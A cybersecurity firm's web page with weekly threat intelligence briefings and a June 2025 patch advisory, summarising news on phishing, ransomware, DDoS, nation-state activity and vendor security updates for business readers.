Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 13 June 2025
Black Arrow Cyber Threat Intelligence Briefing 13 June 2025:
-Scattered Spider Uses Tech Vendor Impersonation and Phishing Kits to Target Helpdesks
-An Emerging Phishing Technique Exploits Trust in Browser-based Messages
-Cyber Attacks on Smartphones Hit New High – Here’s How to Stay Safe
-Distributed Denial of Service Attacks on Financial Sector Surge in Scale and Sophistication
-Cyber Resilience Begins Before the Crisis
-How Did Britain’s Food Supplies Become So Vulnerable?
-Europol Says Criminal Demand for Data is “Skyrocketing”
-AI Is a Data-Breach Time Bomb, Reveals New Report
-What Is Penetration Testing? Types, Processes, Tools, and Why It’s All Worth It
-Internet Infamy Drives the Com’s Crime Sprees
-China-Linked Threat Actor Targeted +70 Orgs Worldwide, SentinelOne Warns
-Here’s Why Ignoring Politics Is No Longer an Option for Cyber Defence
-UK to Join Up with Allies for Stronger Response to Putin’s ‘Grey Zone’ Warfare
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week’s review starts with evolving cyber attack techniques including the targeting of IT and managed service providers to gain access to multiple firms through a single compromise, while other techniques include exploiting end-user trust in messages appearing in browsers, attacks on smartphones, and increasingly complex DDoS attacks. We also reflect on the need for all organisations to proactively plan for a cyber incident, and the need to improve cyber-resilience of food supplies.
Our analysis of specialist and other media highlights the threats that organisations face in protecting their data, with high criminal demand and sensitive data being exposed to insecure and unverified AI tools. We also include information on penetration testing, which is one of the key ways for organisations to identify and address vulnerabilities that can be exploited by attackers.
Finally, we include articles on developments within the attacker community, including groups of teenagers and young adults as well as nation states, and insights into the impact of geo-political developments on cyber security for organisations.
At Black Arrow, we believe organisations achieve the most appropriate security by taking a proactive, cross-functional approach to cyber resilience. This starts with board engagement and threat-informed decision-making, including managing risks that are currently being exploited through third parties such as IT and managed service providers.
Top Cyber Stories of the Last Week
Scattered Spider Uses Tech Vendor Impersonation and Phishing Kits to Target Helpdesks
ReliaQuest has reported that the group behind recent cyber attacks on UK retailers, including Marks & Spencer and Harrods, is now using advanced impersonation tactics to breach organisations via their IT providers. Over 80% of associated domains mimic trusted technology vendors, enabling attacks on high-value targets such as CISOs and CFOs. The group combines phishing kits with social engineering to bypass multi-factor authentication and exploit help desks. Its use of ransomware-as-a-service partnerships allows access to powerful attack tools, expanding its reach. Attacks increasingly target managed service providers to access multiple organisations through a single compromise.
https://www.infosecurity-magazine.com/news/scattered-spider-tech-vendor/
An Emerging Phishing Technique Exploits Trust in Browser-based Messages
ClickFix is an emerging phishing technique exploiting user trust in browser-based messages to deliver malware, with attacks now observed across EMEA and the US. These campaigns trick users into executing PowerShell commands by mimicking familiar prompts, such as fake CAPTCHA checks, browser errors or job interview glitches. Unlike traditional phishing emails, these attacks unfold entirely within the browser, making detection and prevention more difficult. Threat actors are leveraging ClickFix to install a range of malware, from credential stealers to remote access tools, and the method’s adaptability is increasing its appeal. Organisations are advised to adopt phishing-resistant authentication and identity-focused defences.
https://www.darkreading.com/remote-workforce/cutting-edge-clickfix-snowball-phishing
Cyber Attacks on Smartphones Hit New High – Here’s How to Stay Safe
Kaspersky has reported a sharp rise in mobile cyber threats, with malware targeting Android users increasing by 27% in early 2025 compared to the previous quarter. Over 12 million users were affected, with banking trojans and data-stealing malware identified as the primary threats. Some infections were traced to preinstalled malware on new phones, highlighting supply chain risks. Notably active malware families included those capable of stealing credentials, intercepting messages and tampering with cryptocurrency transactions. The report warns that mobile devices are not inherently safer than desktops, and users should treat app downloads and device permissions with far greater caution.
Distributed Denial of Service Attacks on Financial Sector Surge in Scale and Sophistication
FS-ISAC and Akamai have reported a sharp rise in both the volume and complexity of Distributed Denial of Service (DDoS) attacks targeting the financial sector. In October 2024 alone, nearly 350 separate DDoS events were recorded, with some comprising billions of malicious requests. The report highlights a 23% increase in application-layer attacks over the past year, affecting login portals and APIs. What was once seen as a nuisance is now considered a strategic threat, with attackers using adaptive, multi-vector techniques to bypass defences. This surge is fuelled by escalating geopolitical tensions, with hacktivist groups exploiting global events to launch targeted disruption campaigns.
https://www.infosecurity-magazine.com/news/ddos-financial-sector-surge/
Cyber Resilience Begins Before the Crisis
Microsoft’s Deputy CISO highlights the critical need for proactive planning and clear communication in cyber incident response. Many firms treat cyber attacks as isolated IT issues, yet the impact extends across legal, HR, communications and executive leadership. Two common misconceptions, assuming incidents are minor and viewing them as purely technical, undermine resilience. Effective preparation includes tested playbooks, decision frameworks, backup communications, and rehearsed messaging strategies. AI is emerging as a valuable support tool, enhancing detection and response coordination. Ultimately, cyber resilience is a leadership issue requiring cross-functional accountability, continuous refinement, and executive engagement.
https://www.microsoft.com/en-us/security/blog/2025/06/12/cyber-resilience-begins-before-the-crisis/
How Did Britain’s Food Supplies Become So Vulnerable?
A ransomware attack on chilled food distributor Peter Green Chilled left over £100,000 worth of meat products stranded, highlighting vulnerabilities in the UK's cold chain logistics. With around 50 per cent of all UK food moving through this network, any disruption can rapidly impact supermarket shelves. Industry experts warn that cyber attacks on supply chain providers are growing in sophistication, with attackers targeting warehouse systems and vehicle tracking to halt distribution. Despite the sector’s critical role in food and pharmaceutical delivery, it currently lacks formal Critical National Infrastructure recognition, limiting coordinated incident response planning at a national level.
https://www.telegraph.co.uk/news/2025/06/05/how-did-britains-food-supplies-become-so-vulnerable/
Europol Says Criminal Demand for Data is “Skyrocketing”
Europol’s latest assessment highlights a booming criminal underground economy fuelled by an insatiable demand for data. With personal and business information now a central commodity, cyber criminals are exploiting gaps in digital literacy and complex IT environments to steal, trade and weaponise data at scale. Stolen credentials are repeatedly used to fuel further breaches, while specialised marketplaces and encrypted channels facilitate widespread illicit trade. Europol warns this cycle is eroding public trust and undermining economic stability.
https://www.infosecurity-magazine.com/news/europol-criminal-demand-data/
AI Is a Data-Breach Time Bomb, Reveals New Report
Varonis has found that nearly every organisation is vulnerable to data exposure as a result of adopting AI without adequate controls. Analysis of 1,000 data risk assessments revealed 99% had sensitive data exposed to AI tools, and 90% had critical cloud data openly accessible. Shadow AI and unverified apps were present in 98% of cases, while 1 in 7 lacked multi-factor authentication. The report highlights how poor identity governance, excessive data access, and sprawling cloud environments are creating significant breach risks. It urges organisations to tighten access, monitor data use, and employ automation to safeguard information in the AI era.
https://www.bleepingcomputer.com/news/security/ai-is-a-data-breach-time-bomb-reveals-new-report/
What Is Penetration Testing? Types, Processes, Tools, and Why It’s All Worth It
Penetration testing is a controlled and authorised simulation of a cyber attack, designed to identify vulnerabilities that could be exploited by real-world threat actors. Ethical hackers emulate criminal tactics to test systems, infrastructure, and even staff behaviour. While automated scans help detect known flaws, penetration testing offers deeper insight by revealing how small issues can be combined into significant risks. It plays a critical role in strengthening cyber resilience, supporting regulatory compliance such as ISO 27001, and demonstrating due diligence. Organisations typically conduct pen tests one or more times a year, often alongside continuous automated scanning.
Black Arrow delivers tailored penetration testing services together with a range of selected partners to help uncover real-world risks through expert-led assessments.
https://blog.jetbrains.com/teamcity/2025/06/what-is-penetration-testing/
Internet Infamy Drives the Com’s Crime Sprees
A growing cyber criminal movement known as “The Com” is drawing in teenagers and young adults who are motivated more by notoriety than money. Their activities range from phishing and SIM swapping to swatting, sextortion and, in some cases, physical violence. Researchers estimate only a small core group is responsible for the most serious crimes, but the wider subculture is expanding rapidly. Law enforcement is now treating parts of the movement as a terrorism threat, with arrests increasing. Analysts warn that underlying socio-economic pressures are driving recruitment, particularly among minors who are seen as lower-risk by criminal gangs.
https://cyberscoop.com/the-com-subculture-infamy-crimes/
China-Linked Threat Actor Targeted +70 Orgs Worldwide, SentinelOne Warns
SentinelOne has uncovered a sustained cyber espionage campaign linked to China, affecting over 70 organisations globally between July 2024 and March 2025. Targets included government bodies, media outlets, and firms in sectors such as finance, manufacturing, and telecoms. The threat actor, dubbed PurpleHaze, used sophisticated techniques including obfuscated malware and dynamic relay networks to maintain stealth and persistence. Victims ranged from a South Asian government entity to a European media firm and even SentinelOne itself. The research highlights an ongoing trend of state-aligned groups targeting cyber security providers, underscoring the need for continuous monitoring and collective defence through intelligence sharing.
Here’s Why Ignoring Politics Is No Longer an Option for Cyber Defence
Flashpoint’s latest report underscores the growing overlap between global politics and cyber threats, with geopolitical tensions now seen as a key driver of cyber activity. Russian organisations, once largely avoided by cyber criminals, are increasingly targeted due to shifting allegiances following the Ukraine conflict. The SANS Institute found that nearly 500 professionals now view cyber security as a core business risk shaped by international events. Threat actors from countries such as North Korea, Iran, and China are deploying tactics including AI-generated deepfakes and disinformation to destabilise democratic processes and evade sanctions, highlighting the need for a broader geopolitical lens in threat assessments.
https://cybernews.com/security/ignoring-politics-is-no-longer-an-option-for-cyber-pros/
UK to Join Up with Allies for Stronger Response to Putin’s ‘Grey Zone’ Warfare
The UK is strengthening cooperation with allies to deter and respond to so-called grey zone threats, including cyber attacks, sabotage of undersea infrastructure and disinformation operations. These sub-threshold activities, increasingly used by Russia, are designed to destabilise without triggering full-scale military conflict. The Government’s latest Strategic Defence Review highlights the need for joint crisis decision-making and improved readiness to counter such tactics. NATO has reaffirmed that cyber or hybrid attacks may justify a collective response under Article 5. The review also stresses the growing complexity of threats, particularly where state actors blur the lines between conventional, cyber and nuclear deterrence.
https://inews.co.uk/news/politics/uk-allies-putin-grey-zone-warfare-3735380
Governance, Risk and Compliance
Rising strategic role of the CISO | Deloitte Insights
Prep for Layoffs Before They Compromise Security
Docuseries Explores Mental, Physical Hardships of CISOs
Investor behaviour in the wake of cyber's 'black swan' moment | Computer Weekly
The Silent Cyber Crisis Alarming Global Economies and Why It's Time for Collective Action | IBTimes
Cyber resilience begins before the crisis | Microsoft Security Blog
Threats
Ransomware, Extortion and Destructive Attacks
DragonForce Victimisation on the Rise | SC Media UK
Attackers exploit Fortinet flaws to deploy Qilin ransomware
Scattered Spider and DragonForce unite to cash in on M&S hacking
Scattered Spider Uses Tech Vendor Impersonation to Target Helpdesks - Infosecurity Magazine
Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks
Threat hunting case study: DragonForce | Intel 471
Fog ransomware attack uses unusual mix of legitimate and open-source tools
Agencies Release Actionable Guidance on Play Ransomware | Schwabe, Williamson & Wyatt PC - JDSupra
'PathWiper' Attack Hits Critical Infrastructure In Ukraine
LockBit panel data leak shows Chinese orgs among the most targeted - Help Net Security
South African man imprisoned after ransom demand against his former employer
Ransomware Victims
Scattered Spider and DragonForce unite to cash in on M&S hacking
M&S food sales growth collapses after cyber attack
M&S cyber attack should prompt retailers to focus on response
How did Britain’s food supplies become so vulnerable?
M&S restarts online orders after cyber attack - BBC News
Tax resolution firm Optima Tax Relief hit by ransomware, data leaked
Main distributor to Amazon’s Whole Foods hit by cyber attack
British Horseracing Authority targeted by cyber attack - BBC Sport
Phishing & Email Based Attacks
Cutting-Edge ClickFix Tactics Snowball
Study: 73% of founders can’t spot phishing emails | Cybernews
Employees repeatedly fall for vendor email compromise attacks - Help Net Security
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
What is asymmetric cyberattack? | Definition from TechTarget
AitM Phishing Attacks Targeting Microsoft 365 and Google to Steal Login Credentials
That ‘unsubscribe’ link is actually a hidden security risk — do this instead | Tom's Guide
Phishing Alert as Erie Insurance Reveals Cyber “Event” - Infosecurity Magazine
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Employees repeatedly fall for vendor email compromise attacks - Help Net Security
Other Social Engineering
Cutting-Edge ClickFix Tactics Snowball
Help Desk Hoax: How Attackers Bypass Tech Defenses
Cybercriminals are turning stolen data into a thriving black market - Help Net Security
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
What is asymmetric cyberattack? | Definition from TechTarget
The 'red flag' Grindr users should watch out for to stay safe
FIN6 hackers pose as job seekers to backdoor recruiters’ devices
Fraud, Scams and Financial Crime
The 'red flag' Grindr users should watch out for to stay safe
145 criminal domains linked to BidenCash Marketplace seized - Help Net Security
Mastercard: Fraud attempts jump as retailers feel cyber attack sting
US files to seize $7.7M laundered by North Korean IT workers • The Register
Five plead guilty to laundering $36 million stolen in investment scams
44% of people encounter a mobile scam every single day, Malwarebytes finds | Malwarebytes
WordPress Sites Turned Weapon: How VexTrio and Affiliates Run a Global Scam Network
Amazon promises fake reviews crackdown after investigation by UK watchdog | Amazon | The Guardian
Artificial Intelligence
Godfather of AI Alarmed as Advanced Systems Quickly Learning to Lie, Deceive, Blackmail and Hack
Next-Gen Developers Are a Cybersecurity Powder Keg
AI threats leave SecOps teams burned out and exposed - Help Net Security
Cloud and AI drive efficiency, but open doors for attackers - Help Net Security
Cyber crime is surging. Will AI make it worse?
AI is a data-breach time bomb, reveals new report
What CISOs need to know about agentic AI - Help Net Security
Securing agentic AI systems before they go rogue - Help Net Security
UK ICO publishes AI and biometrics strategy | Computer Weekly
Enterprises stuck in AI pilot hell, says Chatterbox Labs • The Register
OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups
Malware
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally
CISO who helped unmask Badbox warns: Version 3 is coming • The Register
FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware
Supply chain attack hits Gluestack NPM packages with 960K weekly downloads
Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks
React Native Aria Packages Backdoored in Supply Chain Attack - SecurityWeek
Malicious NPM Packages Disguised as Express Utilities Allow Attackers to Wipe Systems - SecurityWeek
DanaBot malware operators exposed via C2 bug added in 2022
Bots/Botnets
CISO who helped unmask Badbox warns: Version 3 is coming • The Register
New Mirai botnet infect TBK DVR devices via command injection flaw
Recently Disrupted DanaBot Leaked Valuable Data for 3 Years - SecurityWeek
Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks
Mobile
Cyber attacks on smartphones hit new high - here's how to stay safe | TechRadar
44% of people encounter a mobile scam every single day, Malwarebytes finds | Malwarebytes
Millions of low-cost Android devices turn home networks into crime platforms - Ars Technica
Chinese phone hacks, user lapses create 'mobile security crisis' | Fortune
Blocking stolen phones from the cloud can but won't be done • The Register
Cops want Apple, Google to kill stolen phones remotely • The Register
Apple and Google clash with police and MPs over phone thefts - BBC News
Google patched bug leaking phone numbers tied to accounts
Denial of Service/DoS/DDoS
Don’t give hacktivists what they really want | CSO Online
DDoS Attacks on Financial Sector Surge in Scale and Sophistication - Infosecurity Magazine
Internet of Things – IoT
Millions of low-cost Android devices turn home networks into crime platforms - Ars Technica
CISO who helped unmask Badbox warns: Version 3 is coming • The Register
New Mirai botnet infect TBK DVR devices via command injection flaw
40,000 cameras expose feeds to datacenters, health clinics • The Register
I found terrifying smart home security holes and you probably have them too
Data Breaches/Leaks
Cyber criminals are turning stolen data into a thriving black market - Help Net Security
Europol Says Criminal Demand for Data is “Skyrocketing” - Infosecurity Magazine
Recently Disrupted DanaBot Leaked Valuable Data for 3 Years - SecurityWeek
AI is a data-breach time bomb, reveals new report
The Dark Web's Currency of Choice: Stolen Data - IT Security Guru
Legal aid lawyers face 'chaos' following cyber attack - as some left 'in tears' and... - LBC
Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool
'Major compromise' at NHS temping arm never disclosed • The Register
Phishing Alert as Erie Insurance Reveals Cyber “Event” - Infosecurity Magazine
86 million AT&T customer records reportedly up for sale on the dark web | ZDNET
Insurer Exposed Drivers' Personal Information, Court Told - Law360
Organised Crime & Criminal Actors
Cyber criminals are turning stolen data into a thriving black market - Help Net Security
Europol Says Criminal Demand for Data is “Skyrocketing” - Infosecurity Magazine
Cyber crime is surging. Will AI make it worse?
OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups
Five plead guilty to laundering $36 million stolen in investment scams
Cyber criminals turn to “residential proxy” services to hide malicious traffic
Internet infamy drives The Com's crime sprees | CyberScoop
Cyber crime news: How this Canadian hacker was caught
How Crime-As-A-Service Turned Hacking Into A Subscription Business
Hacking the Hackers: When Bad Guys Let Their Guard Down
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Hacker arrested after exploiting 5,000 accounts in $4.5 million cryptojacking scheme | TechSpot
US accuses Russian crypto entrepreneur of money laundering and sanctions evasion
145 criminal domains linked to BidenCash Marketplace seized - Help Net Security
Insurance
Cyber insurance demand is rising, but not 'evenly': Beazley cyber head | Insurance Business America
MSSPs, MSPs See Growing Strategic Role in Cyber Insurance | MSSP Alert
Supply Chain and Third Parties
New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally
M&S restarts online orders after cyber attack - BBC News
Main distributor to Amazon’s Whole Foods hit by cyber attack
CISOs urged to push vendors for roadmaps on post-quantum cryptography readiness | CSO Online
Third-party security weaknesses threaten Europe’s big banks | Computer Weekly
Supply chain attack hits Gluestack NPM packages with 960K weekly downloads
Cloud/SaaS
Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool
Cloud and AI drive efficiency, but open doors for attackers - Help Net Security
AitM Phishing Attacks Targeting Microsoft 365 and Google to Steal Login Credentials
Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks
Google Cloud and Cloudflare hit by widespread service outages
Outages
Massive cloud outage knocks out internet services across the globe | ZDNET
‘Severe’ network outages costing $160bn globally | Computer Weekly
Encryption
CISOs urged to push vendors for roadmaps on post-quantum cryptography readiness | CSO Online
See How Much Faster a Quantum Computer Will Crack Encryption | WIRED
Quantum Computers Pose a Grave Risk to The Future. Here's Why. : ScienceAlert
Digital rights groups sound alarm on Stop CSAM Act | CyberScoop
Linux and Open Source
Unverified code is the next national security threat | CyberScoop
Passwords, Credential Stuffing & Brute Force Attacks
295 Malicious IPs Launch Coordinated Brute-Force Attacks on Apache Tomcat Manager
Social Media
The 'red flag' Grindr users should watch out for to stay safe
FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware
Regulations, Fines and Legislation
Trump cyber executive order takes aim at prior orders, secure software, more | CyberScoop
Banks Challenge Treasury on Cybersecurity Failures - The Global Treasurer
Digital rights groups sound alarm on Stop CSAM Act | CyberScoop
UK ICO publishes AI and biometrics strategy | Computer Weekly
Trump limits use of cyber rules to punish US hackers, election meddlers - Defense One
Trump to Keep Starlink at White House Despite Cyber Security Concern
Models, Frameworks and Standards
Enterprise SIEMs miss 79% of known MITRE ATT&CK techniques - Help Net Security
SIEMs Missing the Mark on MITRE ATT&CK Techniques
NIST Launches Updated Incident Response Guide - Security Boulevard
NIST Publishes New Zero Trust Implementation Guidance - Infosecurity Magazine
Data Protection
Security & data protection: when two become one | TechRadar
Careers, Working in Cyber and Information Security
Human vs digital therapy: AI falls short when IT pros need help | Computer Weekly
Hands-On Skills Now Key to Landing Your First Cyber Role - Infosecurity Magazine
Law Enforcement Action and Take Downs
Hacker arrested after exploiting 5,000 accounts in $4.5 million cryptojacking scheme | TechSpot
145 criminal domains linked to BidenCash Marketplace seized - Help Net Security
Operation Secure: INTERPOL dismantles 20,000+ malicious IPs in major cybercrime crackdown
Five plead guilty to laundering $36 million stolen in investment scams
Police arrests 20 suspects for distributing child sexual abuse content
South African man imprisoned after ransom demand against his former employer
Misinformation, Disinformation and Propaganda
Amazon promises fake reviews crackdown after investigation by UK watchdog | Amazon | The Guardian
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
EU Prepares for Transnational Cyberattacks - DataBreachToday
UK to join up with allies for stronger response to Putin's 'grey zone' warfare
Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group
What would break first if hackers hit US infrastructure? | Cybernews
Nation State Actors
Ignoring politics is no longer an option for cyber pros | Cybernews
Advanced Persistent Threats (APTs) - Detection and Defense Strategies
EU Prepares for Transnational Cyberattacks - DataBreachToday
OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups
China
China-linked threat actor targeted +70 orgs worldwide, SentinelOne warns
Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group
Chinese hackers broke into US telecom earlier than previously known, Bloomberg reports | Reuters
Chinese phone hacks, user lapses create 'mobile security crisis' | Fortune
Russian Spies Are Suspicious of China, Even as Putin and Xi Grow Close - The New York Times
SentinelOne shares new details on China-linked breach attempt
Russia
Eastern Europe’s Cyber Reckoning: Russia’s Digital Threat Is Forcing a Strategic Shift - Inkstick
UK to join up with allies for stronger response to Putin's 'grey zone' warfare
Russian Spies Are Suspicious of China, Even as Putin and Xi Grow Close - The New York Times
Why Russia Should Fear Ukraine’s Advanced Intelligence Network - The National Interest
'PathWiper' Attack Hits Critical Infrastructure In Ukraine
How The Times Obtained Secret Russian Intelligence Documents - The New York Times
US accuses Russian crypto entrepreneur of money laundering and sanctions evasion
LockBit panel data leak shows Chinese orgs among the most targeted - Help Net Security
'Librarian Ghouls' Cyberattackers Strike at Night
North Korea
US files to seize $7.7M laundered by North Korean IT workers • The Register
Tools and Controls
Enterprise SIEMs miss 79% of known MITRE ATT&CK techniques - Help Net Security
SIEMs Missing the Mark on MITRE ATT&CK Techniques
Next-Gen Developers Are a Cybersecurity Powder Keg
Cyber resilience begins before the crisis | Microsoft Security Blog
CISOs call for operational threat intelligence integration - Help Net Security
Nearly all CISOs struggle with threat intelligence barriers: report
Advanced Persistent Threats (APTs) - Detection and Defense Strategies
NIST Launches Updated Incident Response Guide - Security Boulevard
Cyber insurance demand is rising, but not 'evenly': Beazley cyber head | Insurance Business America
AI threats leave SecOps teams burned out and exposed - Help Net Security
The massive, no-good concerns around agentic AI cybersecurity - Tech Monitor
Study: 73% of founders can’t spot phishing emails | Cybernews
Prep for Layoffs Before They Compromise Security
Why Threat Agents Must be Included in Cyber Security Risk Assessments - Security Boulevard
NIST Publishes New Zero Trust Implementation Guidance - Infosecurity Magazine
MSSPs, MSPs See Growing Strategic Role in Cyber Insurance | MSSP Alert
Inside the Mind of the Adversary: Why More Security Leaders Are Selecting AEV
Your Android phone is getting new security protections - and it's a big deal for enterprises | ZDNET
Microsoft Outlook to block more risky attachments used in attacks
ConnectWise to Rotate ScreenConnect Code Signing Certificates Due to Security Risks
Other News
Investor behaviour in the wake of cyber's 'black swan' moment | Computer Weekly
What Held the Internet Together for 20 Years and Why It’s Now at Risk - Internet Society
EU Updates Cyber Crisis Blueprint to Strengthen Regional Response | MSSP Alert
EU to ‘step up’ on cyber security as dependence on US laid bare
What would break first if hackers hit US infrastructure? | Cybernews
Surge in Cyber Attacks Targeting Journalists: Cloudflare - SecurityWeek
Vulnerability Management
Security flaws in government apps go unpatched for years - Help Net Security
Vulnerabilities
Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws
Adobe Releases Patch Fixing 254 Vulnerabilities, Closing High-Severity Security Gaps
APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware
Multiple Chrome Vulnerabilities Allow Attackers to Execute Malicious Code Remotely
Attackers exploit Fortinet flaws to deploy Qilin ransomware
Over 84,000 Roundcube instances vulnerable to actively exploited flaw
Ivanti Workspace Control hardcoded key flaws expose SQL credentials
Zero Day Initiative — The June 2025 Security Update Review
Palo Alto Networks Patches Privilege Escalation Vulnerabilities - SecurityWeek
Fortinet, Ivanti Patch High-Severity Vulnerabilities - SecurityWeek
Chrome, Firefox Updates Resolve High-Severity Memory Bugs - SecurityWeek
Trend Micro fixes critical vulnerabilities in multiple products
ConnectWise to Rotate ScreenConnect Code Signing Certificates Due to Security Risks
Google patched bug leaking phone numbers tied to accounts
SAP June 2025 Security Patch Day fixed critical NetWeaver bug
Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks
PayU Plugin Flaw Allows Account Takeover on 5000 WordPress Sites - Infosecurity Magazine
Five Zero-Days, 15 Misconfigurations Found in Salesforce Industry Cloud - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 11 June 2025 – Security Updates from Microsoft, Adobe, Ivanti, Salesforce, SAP, and Google
Black Arrow Cyber Advisory 11 June 2025 – Security Updates from Microsoft, Adobe, Ivanti, Salesforce, SAP, and Google
Executive Summary
Microsoft’s Patch Tuesday for June 2025 delivered updates for 66 vulnerabilities, including one actively exploited zero‑day WebDAV remote code execution flaw, alongside nine critical issues such as RCE and privilege escalation in SMB, SharePoint, and Windows Hello for Business.
Adobe patched a number of vulnerabilities addressing critical and important vulnerabilities in Acrobat/Reader, InCopy, and Commerce/Magento—notably patching 254 flaws in Adobe Experience Manager (mostly XSS) and a critical Magento XSS flaw (CVE‑2025‑47110) with potential for arbitrary code execution.
Ivanti’s June advisory fixes multiple high-severity issues in Workspace Control (e.g., SQL credential decrypt) and addresses vulnerabilities in EPMM previously exploited in the wild (CVE‑2025‑4427/4428).
Salesforce Industry Cloud fixed five zero‑days and 15 critical misconfigurations that risk unauthorised access to encrypted data, sessions, credentials, and business logic.
SAP released its June Security Patch Day, addressing 19 notes including a critical NetWeaver RFC missing authorisation flaw (CVE 2025 42989, CVSS 9.6) that allows privilege escalation
Google Chrome received a security update fixing two high severity remote code execution (RCE) bugs in the V8 engine impacting Windows, macOS, and Linux users
What’s the risk to me or my business?
The presence of actively exploited zero‑days and critical RCE/privilege escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.
Microsoft
Further details on specific updates within this Microsoft patch Tuesday can be found here:
June 2025 Security Updates - Release Notes - Security Update Guide - Microsoft
Adobe, Ivanti, Salesforce, SAP, and Google
Further details of the vulnerabilities in affected Adobe, Ivanti, SAP and Google:
https://helpx.adobe.com/security/security-bulletin.html
https://appomni.com/blog/low-code-high-stakes-salesforce-security/
https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html
https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop_10.html
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Intelligence Briefing 06 June 2025
Black Arrow Cyber Threat Intelligence Briefing 06 June 2025:
-Half of Firms Suffer Two Supply Chain Incidents in Past Year
-Vendor Email Compromise (VEC) Attacks Outpace Business Email Compromise (BEC) in EMEA
-UK SMBs Are Ramping Up Cyber Security Spending
-CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership
-CISO 3.0: Leading AI Governance and Security in the Boardroom
-Play Ransomware Breached 900 Victims, Including Critical Orgs
-Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
-Role of Threat Intelligence in Proactive Defence Strategies
-Beware GenAI Use is Outpacing Security Controls
-Why Teenage Hackers Pose More Danger Than Ever
-‘Nation States don’t do hacking for fun’ UK NCSC Urges Businesses to Follow Geopolitics as Defensive Strategy
-Damascened Peacock: Russian Hackers Targeted UK Ministry of Defence
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review this week includes the complexity of cyber risk, with UK organisations reporting a sharp rise in supply chain-related incidents and limited visibility across third-party networks. As we discuss in our training events, vendor email compromise (VEC) is growing in prominence alongside BEC, exploiting trust in external partners to evade detection. Organisations need to review their control framework, including training staff and leaders on identifying and reporting suspicious communications, and adhering to the letter and spirit of operational controls that attackers seek to exploit.
